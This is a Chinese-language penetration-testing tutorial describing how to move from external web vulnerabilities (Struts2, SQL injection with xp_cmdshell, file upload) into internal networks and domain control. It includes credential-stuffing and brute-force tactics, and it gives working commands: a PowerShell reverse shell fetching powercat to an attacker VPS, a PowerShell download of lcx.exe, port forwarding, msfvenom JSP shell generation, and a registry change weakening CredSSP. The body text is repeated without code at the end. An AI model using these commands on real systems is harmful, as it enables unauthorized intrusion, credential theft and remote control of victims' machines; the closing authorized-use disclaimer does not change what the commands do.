从外网到内网的渗透姿势分享

字数 1556 2025-08-26 22:11:28

从外网到内网的渗透测试技术详解

一、渗透测试整体流程

信息收集阶段：收集目标资产信息
漏洞挖掘阶段：通过Web漏洞获取初始访问权限
权限提升阶段：获取Webshell并进一步利用
内网渗透阶段：横向移动和权限提升
域渗透阶段：最终获取域控权限

二、外网漏洞挖掘方法

1. 资产扫描与识别

工具推荐：
- 御剑高速端口扫描工具（调整速度可提高准确性）
- AWVS（Acunetix Web Vulnerability Scanner）
- Nessus
操作要点：
- 批量扫描IP段或网址
- 导出扫描结果后二次分析
- 使用脚本自动化处理扫描结果

2. 常见漏洞类型及利用

(1) 框架/中间件漏洞

常见目标：
- Struts2
- Weblogic
检测方法：
- 使用专用工具批量扫描（如Struts2漏洞检查工具2018版）
- 指纹识别后针对性检测
- 特征识别：URI后缀为.do或.action

(2) 撞库漏洞

适用场景：
- 员工系统
- 登录系统
- 信息查询系统
- OA系统
攻击方法：

无验证码情况：

使用中国常见用户名字典
密码字典：
- 弱口令（如123456）
- 用户名+数字组合（如zhangsan123）

邮箱登录系统：

收集邮箱后缀（通过Google Hack或专用查询网站）
用户名规则：
- 全拼音（zhangsan@abc.com）
- 姓全拼+名缩写（zhangs@abc.com）

有验证码但可绕过：

检查cookie验证机制
尝试删除或修改验证码相关参数

(3) 弱口令漏洞

公网数据库爆破：
- 工具：超级弱口令检查工具
- 目标：整网段扫描
- 配置：勾选所有数据库选项，导入用户名字典和密码字典
内网数据库爆破：
- 工具：F-Scrack、DBScanner
- 特点：内网弱口令更常见

三、从Webshell到内网渗透

1. SQL注入到内网渗透

场景：获取MSSQL注入并开启xp_cmdshell

操作步骤：

执行PowerShell命令反弹shell：

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c [VPS_IP] -p [PORT] -e cmd

VPS监听指定端口等待连接

下载远程工具：

powershell "$c=new-Object \"System.Net.WebClient\";$c.DownloadFile(\"http://[VPS_IP]:[PORT]/lcx.exe\",\"C:/path/to/save/lcx.exe\");"

端口转发：

Windows工具：lcx

Linux工具：portmap

./portmap -m 2 -p1 7777 -h2 [TARGET_IP] -p2 9999

2. Struts2漏洞利用

检测方法：

使用Struts2漏洞检查工具2018版批量扫描
观察URL特征（.do或.action后缀）

利用方法：

方法一：使用PowerShell反弹shell
方法二：上传Webshell
- 先传小马，再传大马
- 注意JSP站点限制（仅支持可见字符字节码）

二进制文件上传技巧：

使用Base64编码上传后解码
参考实现：https://blog.51cto.com/0x007/1204440

3. 文件上传Getshell

典型场景：后台用户头像上传漏洞

利用方法：

修改上传文件后缀为.jsp

使用MSF生成JSP木马：

msfvenom -p java/jsp_shell_bind_tcp LPORT=[PORT] -f raw > shell.jsp
# 或
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f raw > shell.jsp

上传后访问触发

RDP连接问题解决：

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters /v AllowEncryptionOracle /t REG_DWORD /d 2 /f

四、内网渗透技巧

1. 网络环境判断

仅有内网IP：通过端口映射访问
有公网IP：可直接连接
混合环境：可能同时存在内外网IP

2. 代理设置

MSF通过代理进入内网：

proxychains msfconsole
# 或
set proxies socks5:[IP]:[PORT]

3. 工具使用建议

JSP站点渗透：需重点掌握（实战中较PHP更常见）
PowerShell利用：灵活强大，可绕过多种限制
端口转发：必备技能（lcx/ew/portmap）

五、总结与提升建议

批量操作：扫描、爆破等操作务必批量进行
内网重点：最终目标应放在内网渗透和域控获取
持续学习：积累JSP站点渗透经验，掌握多种利用方式
工具熟练度：熟练掌握常用工具（AWVS、Nessus、MSF等）
实战演练：通过CTF或授权测试环境不断练习

注意：本文所述技术仅限授权测试使用，未经授权进行渗透测试属于违法行为。

从外网到内网的渗透测试技术详解一、渗透测试整体流程信息收集阶段：收集目标资产信息漏洞挖掘阶段：通过Web漏洞获取初始访问权限权限提升阶段：获取Webshell并进一步利用内网渗透阶段：横向移动和权限提升域渗透阶段：最终获取域控权限二、外网漏洞挖掘方法 1. 资产扫描与识别工具推荐：御剑高速端口扫描工具（调整速度可提高准确性） AWVS（Acunetix Web Vulnerability Scanner） Nessus 操作要点：批量扫描IP段或网址导出扫描结果后二次分析使用脚本自动化处理扫描结果 2. 常见漏洞类型及利用 (1) 框架/中间件漏洞常见目标： Struts2 Weblogic 检测方法：使用专用工具批量扫描（如Struts2漏洞检查工具2018版）指纹识别后针对性检测特征识别：URI后缀为 .do 或 .action (2) 撞库漏洞适用场景：员工系统登录系统信息查询系统 OA系统攻击方法：无验证码情况：使用中国常见用户名字典密码字典：弱口令（如123456）用户名+数字组合（如zhangsan123）邮箱登录系统：收集邮箱后缀（通过Google Hack或专用查询网站）用户名规则：全拼音（zhangsan@abc.com）姓全拼+名缩写（zhangs@abc.com）有验证码但可绕过：检查cookie验证机制尝试删除或修改验证码相关参数 (3) 弱口令漏洞公网数据库爆破：工具：超级弱口令检查工具目标：整网段扫描配置：勾选所有数据库选项，导入用户名字典和密码字典内网数据库爆破：工具：F-Scrack、DBScanner 特点：内网弱口令更常见三、从Webshell到内网渗透 1. SQL注入到内网渗透场景：获取MSSQL注入并开启xp_ cmdshell 操作步骤：执行PowerShell命令反弹shell： VPS监听指定端口等待连接下载远程工具：端口转发： Windows工具：lcx Linux工具：portmap 2. Struts2漏洞利用检测方法：使用Struts2漏洞检查工具2018版批量扫描观察URL特征（.do或.action后缀）利用方法：方法一：使用PowerShell反弹shell 方法二：上传Webshell 先传小马，再传大马注意JSP站点限制（仅支持可见字符字节码）二进制文件上传技巧：使用Base64编码上传后解码参考实现：https://blog.51cto.com/0x007/1204440 3. 文件上传Getshell 典型场景：后台用户头像上传漏洞利用方法：修改上传文件后缀为.jsp 使用MSF生成JSP木马：上传后访问触发 RDP连接问题解决：四、内网渗透技巧 1. 网络环境判断仅有内网IP ：通过端口映射访问有公网IP ：可直接连接混合环境：可能同时存在内外网IP 2. 代理设置 MSF通过代理进入内网： 3. 工具使用建议 JSP站点渗透：需重点掌握（实战中较PHP更常见） PowerShell利用：灵活强大，可绕过多种限制端口转发：必备技能（lcx/ew/portmap）五、总结与提升建议批量操作：扫描、爆破等操作务必批量进行内网重点：最终目标应放在内网渗透和域控获取持续学习：积累JSP站点渗透经验，掌握多种利用方式工具熟练度：熟练掌握常用工具（AWVS、Nessus、MSF等）实战演练：通过CTF或授权测试环境不断练习注意：本文所述技术仅限授权测试使用，未经授权进行渗透测试属于违法行为。